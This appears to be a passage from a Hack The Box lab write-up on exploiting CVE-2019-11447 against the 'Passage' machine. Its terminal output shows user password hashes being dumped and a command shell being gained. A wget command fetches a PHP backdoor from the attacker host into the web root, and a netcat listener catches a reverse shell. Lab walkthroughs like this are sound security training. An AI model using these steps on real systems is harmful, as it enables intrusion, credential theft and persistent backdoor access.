CVE-2019-11447
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ python3 CVE-2019-11447.py
_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ \/ ___/ __/
/ , _/ /__/ _/
/_/|_|\___/___/
[->] Usage python3 expoit.py
enter the url> http://10.10.10.206/
================================================================
Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN
================================================================
7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
4bdd0a0bb47fc9f66cbf1a8982fd2d344d2aec283d1afaebb4653ec3954dff88
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca
4db1f0bfd63be058d4ab04f18f65331ac11bb494b5792c480faf7fb0c40fa9cc
================================================================
=============================
Registering a users
=============================
[+] registration successful with username: 96fOn2TujQ and password: 96fOn2TujQ
=======================================================
Sending Payload
=======================================================
signature_key: e83d674a0c845a119a3f1601ad431900-96fOn2TujQ
signature_dsi: f0e5f171f6e4cf58678ff5ac25d81963
logged in user: 96fOn2TujQ
============================
Dropping to a SHELL
============================
command > whoami
www-data
command > hostname
passage
command > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Executing the exploit immediately provides me a shell
Since the shell is a bit funky, I will upgrade it by setting up a backdoor at the web root directory
command > wget http://10.10.14.4/shell.php -O /var/www/html/shell.php
Transferring the backdoor over HTTP
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ curl -s http://10.10.10.206/shell.php
Triggering
┌──(kali㉿kali)-[~/archive/htb/labs/passage]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.206] 52940
socket: Shell has connected! PID: 3321
whoami
www-data
hostname
passage
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:04:69 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.206/24 brd 10.10.10.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:469/64 scope global mngtmpaddr dynamic
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:feb9:469/64 scope link
valid_lft forever preferred_lft forever
Initially Foothold established to the target system as the www-data
user via exploiting CVE-2019-11447